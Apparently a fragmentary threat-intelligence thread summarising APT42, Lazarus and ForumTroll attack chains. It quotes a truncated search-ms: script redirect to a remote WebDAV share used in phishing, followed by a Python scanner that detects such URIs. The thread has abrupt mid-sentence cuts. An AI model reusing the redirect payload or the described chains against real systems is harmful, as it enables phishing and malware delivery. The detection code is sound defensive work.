#APT42
Uses fake conference pages to capture credentials, redirects to OneDrive WebDAV shares, downloads LNK files disguised as PDFs, executes curl commands to fetch batch scripts (Temp.bat) from Cloudflare Workers, and loads the PowerShell-based TAMECAT backdoor:
A modular,
#Lazarus exploited a flaw in the Windows AppLocker driver (appid.sys) as a zero-day (CVE-2024-21338) to gain kernel-level access and turn off security tools.
Beyond BYOVD with an Admin-to-Kernel Zero-Day
decoded.avast.io/janvojtesek/la…
The Hacking Team is back/Operation ForumTroll
Phishing link → WebGPU decrypt → Shellcode injection → COM hijack for persistence.
Deploys Dante spyware (successor to RCS from Hacking Team, now Memento Labs) plus a custom LeetAgent for keylogging and file theft.
Exploits:
Zero-days
Phishing emails that use the "search-ms" URI protocol handler to download a malicious payload.
trellix.com/en-us/about/ne…
The ClickOnce APT group also uses this technique.
<script>
window.location.href = 'search-ms:query=Review&crumb=location: \\\\domain@SSL\
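As an added defender-side example (not code from the original post or from any of the cited reports), the Python below scans an HTML or email body for search-ms: URIs like the one quoted above, splits out the query and crumb=location parameters, and flags any whose location points off-host (a UNC root, an @SSL WebDAV host, or an http(s) URL) while leaving local-folder searches alone. The sample HTML is constructed; hostnames under .invalid are placeholders.

```python
import re
from urllib.parse import unquote

# Constructed sample: one off-host search-ms URI of the kind quoted above, and one
# benign local-folder search. Raw string, so backslashes are kept exactly as written.
SAMPLE_HTML = r"""<html><body>
<script>
window.location.href = 'search-ms:query=Review&crumb=location:\\\\files.example.invalid@SSL\\DavWWWRoot&displayname=Downloads';
</script>
<a href="search-ms:query=budget&crumb=location:C:\Users\me\Documents">Find my budget files</a>
</body></html>"""

# A search-ms URI runs until whitespace, a quote or an HTML angle bracket.
SEARCH_MS_RE = re.compile(r'''search-ms:[^\s'"<>]+''', re.IGNORECASE)


def find_search_ms_uris(text):
    """Return every search-ms: URI found in text (HTML, email body, proxy log line)."""
    return [m.group(0) for m in SEARCH_MS_RE.finditer(text)]


def parse_search_ms(uri):
    """Split the '&'-separated parameters after 'search-ms:' into a dict of URL-decoded values."""
    body = uri.split(":", 1)[1]
    params = {}
    for part in body.split("&"):
        if "=" in part:
            key, value = part.split("=", 1)
            params[key.strip().lower()] = unquote(value)
    return params


def is_remote_location(location):
    """True when the crumb location points off-host.

    Matches http(s) URLs, WebDAV markers (@SSL, DavWWWRoot) and UNC roots. Escaping in
    JavaScript or HTML often doubles backslashes, so two or more leading backslashes
    followed by a host character count as a UNC root.
    """
    low = location.strip().lower()
    if low.startswith("http://") or low.startswith("https://"):
        return True
    if "@ssl" in low or "davwwwroot" in low:
        return True
    return bool(re.match(r"\\\\+[a-z0-9]", low))


def triage(text):
    """Return one finding per search-ms URI: its query, location and a suspicious flag."""
    findings = []
    for uri in find_search_ms_uris(text):
        params = parse_search_ms(uri)
        crumb = params.get("crumb", "")
        location = crumb.split(":", 1)[1] if crumb.lower().startswith("location:") else ""
        findings.append({
            "uri": uri,
            "query": params.get("query", ""),
            "location": location,
            "suspicious": is_remote_location(location),
        })
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_HTML):
        label = "SUSPICIOUS" if finding["suspicious"] else "benign    "
        print(f"{label} query={finding['query']!r} location={finding['location']!r}")
```

The check keys on the crumb location rather than on the mere presence of search-ms:, because the handler has legitimate local uses; a location that resolves to a remote share or WebDAV host is what warrants blocking the message or alerting on the proxy log.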